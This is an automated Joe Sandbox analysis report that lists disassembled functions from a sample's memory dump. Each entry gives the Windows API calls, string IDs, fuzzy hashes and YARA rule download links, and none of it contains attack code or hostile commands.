                                        Function 0078A852 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006F2441: GetWindowLongW.USER32(00000000,000000EB), ref: 006F2452
                                        • GetClientRect.USER32(?,?), ref: 0078A890
                                        • GetCursorPos.USER32(?), ref: 0078A89A
                                        • ScreenToClient.USER32(?,?), ref: 0078A8A5
                                        • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 0078A8D9
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Client$CursorLongProcRectScreenWindow
                                        • String ID:
                                        • API String ID: 4127811313-0
                                        • Opcode ID: b5c88396be6591023c212e31240684354f31bc97776b0216abaaeff0cc864925
                                        • Instruction ID: c2095b7ca5bc0c995c1be24be337c5ab3c9e2e22d7a12df4508ff0c00e37069f
                                        • Opcode Fuzzy Hash: b5c88396be6591023c212e31240684354f31bc97776b0216abaaeff0cc864925
                                        • Instruction Fuzzy Hash: A5112571A80119FFEB15AF98D8499EE77B8EB04310F104456E912A2191D778AE82CBB6
                                        Function 0075EA02 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 0075EA29
                                        • MessageBoxW.USER32(?,?,?,?), ref: 0075EA5C
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0075EA72
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0075EA79
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 2880819207-0
                                        • Opcode ID: 687fef7fdcf1b54bc414d0772bb08da523bfbb5ef8163959ec69b5c67911fc54
                                        • Instruction ID: 6435af74808159ef64a40d81edef96cb8969903cc7759b18a88a5a34d656e43b
                                        • Opcode Fuzzy Hash: 687fef7fdcf1b54bc414d0772bb08da523bfbb5ef8163959ec69b5c67911fc54
                                        • Instruction Fuzzy Hash: 24110C75904258BBD715ABB89C09DDB7F6DAB45311F14C11AF814E32D1D2BC8E048761
                                        Function 00788773 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00788792
                                        • ScreenToClient.USER32(?,?), ref: 007887AA
                                        • ScreenToClient.USER32(?,?), ref: 007887CE
                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007887E9
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ClientRectScreen$InvalidateWindow
                                        • String ID:
                                        • API String ID: 357397906-0
                                        • Opcode ID: 3600e1b3db7ab9172260b60271cecf8a9e71c404949697f0098b351872a5c490
                                        • Instruction ID: 832fc30e72844742c3c1d29efa5304301fb23701da459549dc956f157f0f5ec2
                                        • Opcode Fuzzy Hash: 3600e1b3db7ab9172260b60271cecf8a9e71c404949697f0098b351872a5c490
                                        • Instruction Fuzzy Hash: 601160B9D0020DAFDB51DFA8C884AEEBBB5FF08310F108166E915E3250E735AA508F50
                                        Function 006F2150 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 006F216C
                                        • SetTextColor.GDI32(?,?), ref: 006F2176
                                        • SetBkMode.GDI32(?,00000001), ref: 006F2189
                                        • GetStockObject.GDI32(00000005), ref: 006F2191
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Color$ModeObjectStockText
                                        • String ID:
                                        • API String ID: 4037423528-0
                                        • Opcode ID: cb4bd803fb700f78174ff3828ffb31b131a0269c70c0322810c7715d2e8621a6
                                        • Instruction ID: b88021a6bea60b7f2a4b5a57c6ada13d35145594738e1778427ce0a774011bdc
                                        • Opcode Fuzzy Hash: cb4bd803fb700f78174ff3828ffb31b131a0269c70c0322810c7715d2e8621a6
                                        • Instruction Fuzzy Hash: 13E06531680244AEEB315B74AC0DBE87B21AF12335F14C215F7BA440E1C3754A549F15
                                        Function 0074EBD6 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 0074EBD6
                                        • GetDC.USER32(00000000), ref: 0074EBE0
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0074EC00
                                        • ReleaseDC.USER32(?), ref: 0074EC21
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: 3d9744e17569b1fb22ec3b65f49b7eefe64e0805c71434c5ca347c0a02d781aa
                                        • Instruction ID: 345a2915eceec8196fda78017c094b16884f67518645a55565ebb27790ae5248
                                        • Opcode Fuzzy Hash: 3d9744e17569b1fb22ec3b65f49b7eefe64e0805c71434c5ca347c0a02d781aa
                                        • Instruction Fuzzy Hash: D2E012B0940209DFCB61AFA0880CA6DBBB1FB08350F21C549F90AE3290D73C4941DF08
                                        Function 0074EBEA Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 0074EBEA
                                        • GetDC.USER32(00000000), ref: 0074EBF4
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0074EC00
                                        • ReleaseDC.USER32(?), ref: 0074EC21
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: 1882ca4d1887323312317b98ca26536f5b73d282fc4342ba3e937eadbc7be474
                                        • Instruction ID: 8edcd1ba25b920e8b1062e9e7abb95a22fa684cb92e344c4dd65f971f8f4c401
                                        • Opcode Fuzzy Hash: 1882ca4d1887323312317b98ca26536f5b73d282fc4342ba3e937eadbc7be474
                                        • Instruction Fuzzy Hash: EFE01AB0940208EFCB60AFB0880CA6DBBB2BB08350F21C549F909E3290D73C99019F08
                                        Function 0071E60D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                        Download Yara Rule
                                        APIs
                                        • __startOneArgErrorHandling.LIBCMT ref: 0071E69D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ErrorHandling__start
                                        • String ID: pow
                                        • API String ID: 3213639722-2276729525
                                        • Opcode ID: 2b5046a4b48804e04668a419e5bb7436ae5d4b8ff5f0408f451883783261f3b0
                                        • Instruction ID: adaaf3b2d459a878e455de2a79fe65d1c01af7ccd94adc0d0cb3aef9d7d06c98
                                        • Opcode Fuzzy Hash: 2b5046a4b48804e04668a419e5bb7436ae5d4b8ff5f0408f451883783261f3b0
                                        • Instruction Fuzzy Hash: 55518C71A0A205D6D711771CED013EA2BA4EB60740F74895DE8D1422E9EF3E8CE69B4B
                                        Function 0070A86C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: 3cb69d6ab9019d0e53f8a2d983a876a04c8d4c0267fcb348303dc94324acedf9
                                        • Instruction ID: a47577ecd3bbb9578f61f2af6024c3a2e6f8ca1ca0e60f4abc5d6e29d6ba359e
                                        • Opcode Fuzzy Hash: 3cb69d6ab9019d0e53f8a2d983a876a04c8d4c0267fcb348303dc94324acedf9
                                        • Instruction Fuzzy Hash: F251233160438AEFCF55DF28C440ABE7BA1EF15310F254159E9919B2D1DB3CAD42CB62
                                        Function 007760A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper_wcslen
                                        • String ID: CALLARGARRAY
                                        • API String ID: 157775604-1150593374
                                        • Opcode ID: 8dcee46d33c28cca65acd418a0311a5edc5f0444c12034928dbd1ccf6cd9e63f
                                        • Instruction ID: 8f7ce1d9787c97028aa6f0afbd615571ee257ba4910a3c158542db3c622b8d4d
                                        • Opcode Fuzzy Hash: 8dcee46d33c28cca65acd418a0311a5edc5f0444c12034928dbd1ccf6cd9e63f
                                        • Instruction Fuzzy Hash: 1D41B371A00519DFCF04DFA8C8898FEBBB5EF58360F548169E509A7292D7789D81CB50
                                        Function 00784E96 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00784F7E
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00784F93
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: '
                                        • API String ID: 3850602802-1997036262
                                        • Opcode ID: 2bb27caa336aa0b181d3fcd9be32910c0bf176611e654eae5ed8cf1fe7e578bd
                                        • Instruction ID: 168d75998e8cfe28d019b192dfdd90b78a54bad94e25b825504027870c7ef84f
                                        • Opcode Fuzzy Hash: 2bb27caa336aa0b181d3fcd9be32910c0bf176611e654eae5ed8cf1fe7e578bd
                                        • Instruction Fuzzy Hash: 16313775A4130A9FDB14DFA9C880BDABBF5FF48314F14406AEA05AB391D7B4A941CF90
                                        Function 0078406F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006F771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006F7759
                                          • Part of subcall function 006F771B: GetStockObject.GDI32(00000011), ref: 006F776D
                                          • Part of subcall function 006F771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 006F7777
                                        • GetWindowRect.USER32(00000000,?), ref: 007840D9
                                        • GetSysColor.USER32(00000012), ref: 007840F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                        • String ID: static
                                        • API String ID: 1983116058-2160076837
                                        • Opcode ID: 424c9b633b150f468edf1429d681019250b834055230bbc0a996a4ec9b9b0ca3
                                        • Instruction ID: 37bdfc7fd74611b6dbbf977da6f817f1c5bfcd65097648eed4b5cbde2a0059ff
                                        • Opcode Fuzzy Hash: 424c9b633b150f468edf1429d681019250b834055230bbc0a996a4ec9b9b0ca3
                                        • Instruction Fuzzy Hash: 0F11297265020AAFDB10EFA8CC45EFA7BE8FB08314F104529F955E3290E678E8519B60
                                        Function 0075256E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 00754536: GetClassNameW.USER32(?,?,000000FF), ref: 00754559
                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007525DC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: da290b4bb511d0c06f0a0f53b65b0a4ac2594aed09e332c4550e68e2cb20ef48
                                        • Instruction ID: dd8f4ccdd0a81468e54f26ec5a931f54305533d3fd9f50fb97b9937d03a2efd0
                                        • Opcode Fuzzy Hash: da290b4bb511d0c06f0a0f53b65b0a4ac2594aed09e332c4550e68e2cb20ef48
                                        • Instruction Fuzzy Hash: 710128B1600119ABCB14EB64CC15DFE7775AF52310B140609BD72932D7FF78991E8654
                                        Function 00752468 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 00754536: GetClassNameW.USER32(?,?,000000FF), ref: 00754559
                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 007524D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 5b41746d7e22a9046786e998915b40849234b17ff68b5f21ed87da2d3fc7478c
                                        • Instruction ID: 9c5b65eb6ae32728dae5cd45286547ce793e3f670cb1f842170b8a28be4c1796
                                        • Opcode Fuzzy Hash: 5b41746d7e22a9046786e998915b40849234b17ff68b5f21ed87da2d3fc7478c
                                        • Instruction Fuzzy Hash: 9101F7B164014DBBDB24EBA0C815EFF77A99F12340F14001D6A02632C7DE989E0DC676
                                        Function 007524EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 00754536: GetClassNameW.USER32(?,?,000000FF), ref: 00754559
                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00752558
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 4b89a6f7840c2a47f24dbef1f154a7375b1af7be22bcb959db75548516a054ac
                                        • Instruction ID: fdd3941ccd5b57deaaf119a10f74635b69b9ae36f7b0c0a439bb5efd82481d6f
                                        • Opcode Fuzzy Hash: 4b89a6f7840c2a47f24dbef1f154a7375b1af7be22bcb959db75548516a054ac
                                        • Instruction Fuzzy Hash: 2801F2B1640149A7CB14EBA4C916EFF73A99F12740F2400197E02A3283FAA89F1D8679
                                        Function 007525F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 00754536: GetClassNameW.USER32(?,?,000000FF), ref: 00754559
                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00752663
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: ddb65ae9afcab86a1d08e74d8af76d5a6a3c77a0ed87c9f1055e511d063ee554
                                        • Instruction ID: f82359d191a56cd594327a6fb6de7a819a56ed5ea1d7d7c6bba19f389352c77a
                                        • Opcode Fuzzy Hash: ddb65ae9afcab86a1d08e74d8af76d5a6a3c77a0ed87c9f1055e511d063ee554
                                        • Instruction Fuzzy Hash: 89F044B1A4021DAACB14FBA4CC52FFF7379EF01310F000909BA22A32C3DFA8590D8258
                                        Function 00788AD1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007C4018,007C405C), ref: 00788B1E
                                        • CloseHandle.KERNEL32 ref: 00788B30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: \@|
                                        • API String ID: 3712363035-858619092
                                        • Opcode ID: 4d03502597237bb2b6f1a89a31ed478578eda4ddecdd9190bfa0906568fee56c
                                        • Instruction ID: 96e12d92d765cdf2015088170449d244098d4d14ace22937ec90b7c502d2a485
                                        • Opcode Fuzzy Hash: 4d03502597237bb2b6f1a89a31ed478578eda4ddecdd9190bfa0906568fee56c
                                        • Instruction Fuzzy Hash: 00F03AB2580304BAE3202B64AC69FB73B5CEB05790F004069BB08D65D2D66D8C9093AD
                                        Function 00782CB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00782CCB
                                        • PostMessageW.USER32(00000000), ref: 00782CD2
                                          • Part of subcall function 0075F1A7: Sleep.KERNEL32 ref: 0075F21F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: c60e3b8138696d302b5dfcd55e19b357a680c2cc123ca28a4198732b5b9d9274
